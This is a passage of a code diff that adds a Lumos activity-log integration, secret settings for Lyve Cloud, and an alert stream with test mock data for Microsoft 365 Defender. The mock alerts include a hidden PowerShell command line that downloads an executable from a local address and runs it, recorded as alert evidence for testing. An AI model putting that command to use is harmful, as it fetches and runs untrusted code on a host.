+- name: lumos.activity_logs.targets + type: group +- name: lumos.activity_logs.targets.target_type + type: keyword +- name: lumos.activity_logs.targets.name + type: keyword diff --git a/packages/lumos/data_stream/activity_logs/manifest.yml b/packages/lumos/data_stream/activity_logs/manifest.yml new file mode 100644 index 00000000000..8cf49ac76dd --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/manifest.yml @@ -0,0 +1,39 @@ +type: logs +title: Lumos Activity Logs +streams: + - input: httpjson + vars: + - name: api_token + type: password + title: API Token + description: The API Token used to authenticate with the Lumos API + multi: false + required: true + show_user: true + secret: true + - name: interval + type: text + title: Interval + multi: false + required: true + show_user: true + description: Interval at which the logs will be pulled. The value must be between 2m and 1h. Supported units for this parameter are h/m/s. + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + description: Initial interval at which the logs will be pulled. Defaults to 24 hours. Supported units for this parameter are h/m/s. + default: 24h + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: "Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. \nThis executes in the agent before the logs are parsed. \nSee [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.\n" + template_path: httpjson.yml.hbs + title: Lumos Activity Logs + description: Collect Lumos Activity Logs via the API diff --git a/packages/lumos/data_stream/activity_logs/sample_event.json b/packages/lumos/data_stream/activity_logs/sample_event.json new file mode 100644 index 00000000000..3ee0174f430 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/sample_event.json @@ -0,0 +1,78 @@ +{ + "@timestamp": "2024-03-14T17:53:58.869Z", + "agent": { + "ephemeral_id": "9d0d6b51-1c05-4ab1-ab5c-c16e485d734f", + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "lumos.activity_logs", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "agent_id_status": "verified", + "created": "2024-03-14T17:53:58.869Z", + "dataset": "lumos.activity_logs", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "ingested": "2024-03-14T17:54:10Z", + "kind": "event", + "outcome": "success", + "type": "info" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "fb3be8e9409740ebb6621b777f0c397d", + "ip": [ + "192.168.144.7" + ], + "mac": [ + "02-42-C0-A8-90-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.6.12-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "httpjson" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[{\"name\":\"Untitled Rule\",\"target_type\":\"SOD Policy\"}]}" +} \ No newline at end of file diff --git a/packages/lumos/docs/README.md b/packages/lumos/docs/README.md new file mode 100644 index 00000000000..71a04477a00 --- /dev/null +++ b/packages/lumos/docs/README.md @@ -0,0 +1,136 @@ +# Lumos Integration + +The Lumos integration uses [Lumos' API](https://api.lumos.com/) to retrieve Activity Logs and ingest them into Elasticsearch. This allows you to search, observe, and visualize the Activity Logs through Elasticsearch. + +The Elastic agent running this integration interacts with Lumos' infrastructure using their APIs to retrieve [Activity Logs](https://api.lumos.com/activity_logs) for a Lumos tenant. + +## Configuration + +### Enabling the integration in Elastic + +1. In Kibana go to **Management > Integrations** +2. In the "Search for integrations" search bar type **Lumos**. +3. Click on "Lumos" integration from the search results. +4. Click on **Add Lumos** button to add Lumos integration. + +### Configure Lumos Activity Logs data stream + +1. In Lumos go to **Settings > API Tokens** +2. Click on "Add API Token", enter a name and description +3. Copy the key starting with `lsk_` +4. While adding Lumos integration in Elastic, paste your key into the `API Token` field + +## Logs + +### Activity Logs + +Activity Logs summarize the history of changes and events occurring within Lumos. + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.action | The activity that occurred | keyword | +| event.created | The time the event began | date | +| event.id | The event hash | keyword | +| event.module | Event module | constant_keyword | +| event.outcome | The outcome of the event, whether it succeeded or failed | keyword | +| input.type | Input type | keyword | +| lumos.activity_logs.actor.actor_type | The type of actor | keyword | +| lumos.activity_logs.actor.email | The email of the actor | keyword | +| lumos.activity_logs.actor.family_name | The family name of the actor | keyword | +| lumos.activity_logs.actor.given_name | The given name of the actor | keyword | +| lumos.activity_logs.event_began_at | The time the event began | keyword | +| lumos.activity_logs.event_type_user_friendly | The user friendly type of the event | keyword | +| lumos.activity_logs.targets.name | | keyword | +| lumos.activity_logs.targets.target_type | | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | + + +An example event for `activity` looks as following: + +```json +{ + "@timestamp": "2024-03-14T17:53:58.869Z", + "agent": { + "ephemeral_id": "9d0d6b51-1c05-4ab1-ab5c-c16e485d734f", + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "lumos.activity_logs", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "agent_id_status": "verified", + "created": "2024-03-14T17:53:58.869Z", + "dataset": "lumos.activity_logs", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "ingested": "2024-03-14T17:54:10Z", + "kind": "event", + "outcome": "success", + "type": "info" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "fb3be8e9409740ebb6621b777f0c397d", + "ip": [ + "192.168.144.7" + ], + "mac": [ + "02-42-C0-A8-90-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.6.12-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "httpjson" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[{\"name\":\"Untitled Rule\",\"target_type\":\"SOD Policy\"}]}" +} +``` \ No newline at end of file diff --git a/packages/lumos/img/activity-log-screenshot.png b/packages/lumos/img/activity-log-screenshot.png new file mode 100644 index 00000000000..bc266a997f9 Binary files /dev/null and b/packages/lumos/img/activity-log-screenshot.png differ diff --git a/packages/lumos/img/lumos-logo.svg b/packages/lumos/img/lumos-logo.svg new file mode 100644 index 00000000000..c30b5f3eb9c --- /dev/null +++ b/packages/lumos/img/lumos-logo.svg @@ -0,0 +1,16 @@ + + + + + + + + + + + + + + + + diff --git a/packages/lumos/img/lumos-screenshot.png b/packages/lumos/img/lumos-screenshot.png new file mode 100644 index 00000000000..425c1aa5b3a Binary files /dev/null and b/packages/lumos/img/lumos-screenshot.png differ diff --git a/packages/lumos/manifest.yml b/packages/lumos/manifest.yml new file mode 100644 index 00000000000..f8e0cfed1d0 --- /dev/null +++ b/packages/lumos/manifest.yml @@ -0,0 +1,55 @@ +format_version: 3.1.2 +name: lumos +title: "Lumos" +version: 0.1.0 +description: "An integration with Lumos to ship your Activity logs to your Elastic instance." +type: integration +categories: + - security +conditions: + kibana: + version: "^8.12.1" + elastic: + subscription: "basic" +screenshots: + - src: /img/lumos-screenshot.png + title: Lumos screenshot + size: 600x600 + type: image/png + - src: /img/activity-log-screenshot.png + title: Activity Log screenshot + size: 1496x433 + type: image/png +icons: + - src: /img/lumos-logo.svg + title: Lumos logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: lumos + title: Lumos Activity Logs + description: Collect Activity Logs from Lumos + inputs: + - type: httpjson + title: "Collect Activity Logs via API" + description: "Collecting Activity Logs from Slack via API" + vars: + - name: api_url + type: text + title: API URL. + description: The root URL for the API endpoints + multi: false + required: true + show_user: false + default: https://api.lumos.com + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: true + default: 60s +owner: + github: elastic/security-service-integrations + type: partner diff --git a/packages/lyve_cloud/changelog.yml b/packages/lyve_cloud/changelog.yml index f28cb274dd8..272e7d0bfb4 100644 --- a/packages/lyve_cloud/changelog.yml +++ b/packages/lyve_cloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.13.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.12.1" changes: - description: Changed owners diff --git a/packages/lyve_cloud/data_stream/audit/manifest.yml b/packages/lyve_cloud/data_stream/audit/manifest.yml index 936667867ff..5cb4cad1eb8 100644 --- a/packages/lyve_cloud/data_stream/audit/manifest.yml +++ b/packages/lyve_cloud/data_stream/audit/manifest.yml @@ -47,12 +47,14 @@ streams: multi: false required: true show_user: true + secret: true - name: secret_access_key type: password title: Secret Access Key multi: false required: true show_user: true + secret: true - name: endpoint type: text title: Endpoint diff --git a/packages/lyve_cloud/manifest.yml b/packages/lyve_cloud/manifest.yml index f08ffa0a34a..1796b2f6000 100644 --- a/packages/lyve_cloud/manifest.yml +++ b/packages/lyve_cloud/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: lyve_cloud title: Lyve Cloud -version: "1.12.1" +version: "1.13.0" description: Collect S3 API audit log from Lyve Cloud with Elastic Agent. type: integration categories: - security conditions: kibana: - version: "^8.5.0" + version: "^8.12.0" icons: - src: /img/LyveCloud-Logo.svg title: Seagate-Lyve-Cloud diff --git a/packages/m365_defender/_dev/build/build.yml b/packages/m365_defender/_dev/build/build.yml index 2bfcfc223b0..71f48ba2a9c 100644 --- a/packages/m365_defender/_dev/build/build.yml +++ b/packages/m365_defender/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/m365_defender/_dev/build/docs/README.md b/packages/m365_defender/_dev/build/docs/README.md index c2925b1e992..6848244a124 100644 --- a/packages/m365_defender/_dev/build/docs/README.md +++ b/packages/m365_defender/_dev/build/docs/README.md @@ -2,7 +2,7 @@ ## Overview -The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. +The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Alert, Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. Use the Microsoft 365 Defender integration to collect and parse data from the Microsoft Azure Event Hub, Microsoft Graph Security v1.0 REST API and Microsoft 365 Defender API. Then visualise that data in Kibana. @@ -10,7 +10,9 @@ For example, you could use the data from this integration to consolidate and cor ## Data streams -The Microsoft 365 Defender integration collects logs for three types of events: Event, Incident and Log. +The Microsoft 365 Defender integration collects logs for four types of events: Alert, Event, Incident and Log. + +**Alert:** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/graph/api/resources/security-alert?view=graph-rest-1.0) to collect alerts including suspicious activities in a customer's tenant that Microsoft or partner security providers have identified and flagged for action. **Event (Recommended):** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/microsoft-365/security/defender/streaming-api?view=o365-worldwide) to collect Alert, Device, Email, App and Identity Events. Events are streamed to an Azure Event Hub. For a list of Supported Events exposed by the Streaming API and supported by Elastic's integration, please see Microsoft's documentation [here](https://learn.microsoft.com/en-us/microsoft-365/security/defender/supported-event-types?view=o365-worldwide). @@ -73,6 +75,16 @@ For **Event**, in filebeat [Azure Event Hub](https://www.elastic.co/guide/en/bea ## Logs reference +### alert + +This is the `alert` dataset. + +#### Example + +{{event "alert"}} + +{{fields "alert"}} + ### event This is the `event` dataset. diff --git a/packages/m365_defender/_dev/deploy/docker/alert-http-mock-config.yml b/packages/m365_defender/_dev/deploy/docker/alert-http-mock-config.yml new file mode 100644 index 00000000000..cc4310826ea --- /dev/null +++ b/packages/m365_defender/_dev/deploy/docker/alert-http-mock-config.yml @@ -0,0 +1,569 @@ +rules: + - path: /tenant_id/oauth2/v2.0/token + methods: [POST] + query_params: + grant_type: client_credentials + request_headers: + Content-Type: + - "application/x-www-form-urlencoded" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + {"access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN","token_type": "Bearer","not_before": 1549647431,"expires_in": 3600} + - path: /v1.0/security/alerts_v2 + methods: [GET] + query_params: + $skip: 0 + $top: 2 + request_headers: + Authorization: + - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + { + "value": [ + { + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "providerAlertId": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incidentId": "23", + "status": "new", + "severity": "medium", + "classification": null, + "determination": null, + "serviceSource": "microsoftDefenderForEndpoint", + "detectionSource": "microsoftDefenderForEndpoint", + "productName": "Microsoft Defender for Endpoint", + "detectorId": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "tenantId": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "recommendedActions": "1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "category": "Execution", + "assignedTo": null, + "alertWebUrl": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "incidentWebUrl": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "actorDisplayName": null, + "threatDisplayName": null, + "threatFamilyName": null, + "mitreTechniques": [ + "T1059.001" + ], + "createdDateTime": "2023-10-20T09:53:09.8839373Z", + "lastUpdateDateTime": "2023-10-20T09:54:07.5033333Z", + "resolvedDateTime": null, + "firstActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "lastActivityDateTime": "2023-10-20T09:51:41.9939003Z", + "alertPolicyId": null, + "additionalData": null, + "comments": [], + "evidence": [ + { + "@odata.type": "#microsoft.graph.security.deviceEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [ + "PrimaryDevice" + ], + "tags": [], + "firstSeenDateTime": "2023-10-20T09:50:17.7383987Z", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "azureAdDeviceId": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "deviceDnsName": "clw555test", + "osPlatform": "Windows11", + "osBuild": 22621, + "version": "22H2", + "healthStatus": "inactive", + "riskScore": "high", + "rbacGroupId": 0, + "rbacGroupName": null, + "onboardingStatus": "onboarded", + "defenderAvStatus": "notSupported", + "ipInterfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "vmMetadata": null, + "loggedOnUsers": [ + { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD" + } + ] + }, + { + "@odata.type": "#microsoft.graph.security.userEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": null, + "userPrincipalName": null, + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.urlEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "url": "http://127.0.0.1/1.exe" + }, + { + "@odata.type": "#microsoft.graph.security.ipEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "ipAddress": "127.0.0.1", + "countryLetterCode": null + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 8224, + "parentProcessId": 5772, + "processCommandLine": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "processCreationDateTime": "2023-10-20T09:51:39.4997961Z", + "parentProcessCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "fileName": "powershell.exe", + "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "fileSize": 491520, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": null, + "userPrincipalName": null, + "displayName": null + } + } + ] + }, + { + "id": "da2046fc02-67f1-41f5-923d-ef916d70c005_1", + "providerAlertId": "2046fc02-67f1-41f5-923d-ef916d70c005_1", + "incidentId": "23", + "status": "new", + "severity": "informational", + "classification": null, + "determination": null, + "serviceSource": "microsoftDefenderForEndpoint", + "detectionSource": "microsoftDefenderForEndpoint", + "productName": "Microsoft Defender for Endpoint", + "detectorId": "de54c08f-c3f5-40e3-ae58-7e3fffbc2574", + "tenantId": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "[Test Alert] Suspicious Powershell commandline", + "description": " This is a test alert \nA suspicious Powershell commandline was found on the machine. This commandline might be used during installation, exploration, or in some cases with lateral movement activities which are used by attackers to invoke modules, download external payloads, and get more information about the system. Attackers usually use Powershell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "recommendedActions": " This is a test alert \n1. Examine the PowerShell commandline to understand what commands were executed. Note: the script may need to be decoded if it is base64-encoded\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert. \n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "category": "Execution", + "assignedTo": null, + "alertWebUrl": "https://security.microsoft.com/alerts/da2046fc02-67f1-41f5-923d-ef916d70c005_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "incidentWebUrl": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "actorDisplayName": null, + "threatDisplayName": null, + "threatFamilyName": null, + "mitreTechniques": [ + "T1059.001" + ], + "createdDateTime": "2023-10-20T09:54:06.750499Z", + "lastUpdateDateTime": "2023-10-20T09:54:10.4666667Z", + "resolvedDateTime": null, + "firstActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "lastActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "alertPolicyId": null, + "additionalData": null, + "comments": [], + "evidence": [ + { + "@odata.type": "#microsoft.graph.security.deviceEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [ + "PrimaryDevice" + ], + "tags": [], + "firstSeenDateTime": "2023-10-20T09:50:17.7383987Z", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "azureAdDeviceId": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "deviceDnsName": "clw555test", + "osPlatform": "Windows11", + "osBuild": 22621, + "version": "22H2", + "healthStatus": "inactive", + "riskScore": "high", + "rbacGroupId": 0, + "rbacGroupName": null, + "onboardingStatus": "onboarded", + "defenderAvStatus": "notSupported", + "ipInterfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "vmMetadata": null, + "loggedOnUsers": [] + }, + { + "@odata.type": "#microsoft.graph.security.userEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 5772, + "parentProcessId": 7408, + "processCommandLine": "\"cmd.exe\" ", + "processCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "parentProcessCreationDateTime": "2023-10-20T09:34:32.0067951Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "13e9bb7e85ff9b08c26a440412e5cd5d296c4d35", + "sha256": "423e0e810a69aaceba0e5670e58aff898cf0ebffab99ccb46ebb3464c3d2facb", + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "explorer.exe", + "filePath": "C:\\Windows", + "fileSize": 5261576, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 8224, + "parentProcessId": 5772, + "processCommandLine": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "processCreationDateTime": "2023-10-20T09:51:39.4997961Z", + "parentProcessCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "fileName": "powershell.exe", + "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "fileSize": 491520, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + } + ] + } + ] + } + - path: /v1.0/security/alerts_v2 + methods: [GET] + query_params: + $skip: 2 + $top: 2 + request_headers: + Authorization: + - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + { + "value": [ + { + "id": "dab4728eea-b128-44e3-ac16-a21f73b5436b_1", + "providerAlertId": "b4728eea-b128-44e3-ac16-a21f73b5436b_1", + "incidentId": "23", + "status": "new", + "severity": "low", + "classification": null, + "determination": null, + "serviceSource": "microsoftDefenderForEndpoint", + "detectionSource": "microsoftDefenderForEndpoint", + "productName": "Microsoft Defender for Endpoint", + "detectorId": "9bfe28a9-21eb-4f8a-b51e-38ebd3650c88", + "tenantId": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious Process Discovery", + "description": "A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.", + "recommendedActions": "A. Validate the alert.\n1. Review the alert and inspect the tool that was used to gather information. Inspect the account that was used to launch the tool.\n2. Check the device timeline for other suspicious activities.\n3. Locate unfamiliar processes in the process tree. Check files for prevalence, their locations, and digital signatures.\n4. Submit relevant files for deep analysis and review file behaviors.\n5. Identify unusual system activity with system owners.\n\nB. Scope the incident. Find related devices in the incident graph. \n\nC. Contain and mitigate the breach. Stop suspicious scripts or processes, isolate affected devices, decommission compromised accounts or reset passwords, block IP addresses and URLs, and install security updates.\n\nD. Contact your incident response team or contact Microsoft support for investigation and remediation services.", + "category": "Discovery", + "assignedTo": null, + "alertWebUrl": 